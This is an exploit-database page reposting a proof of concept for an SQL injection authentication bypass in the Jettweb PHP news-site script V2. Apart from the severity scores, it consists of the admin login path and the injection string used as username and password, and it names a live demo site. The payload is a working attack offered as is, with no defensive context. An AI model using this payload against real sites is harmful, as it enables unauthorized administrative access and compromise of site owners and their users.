Advertisement






Jettweb PHP Hazir Haber Sitesi Scripti 2 SQL Injection

CVE Category Price Severity
CWE-89 Not disclosed High
Author Risk Exploitation Type Date
Not disclosed High Remote 2019-03-25
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030208

Below is a copy:

Jettweb PHP Hazir Haber Sitesi Scripti 2 SQL Injection
# Exploit Title: Jettweb PHP Hazr Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet mit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.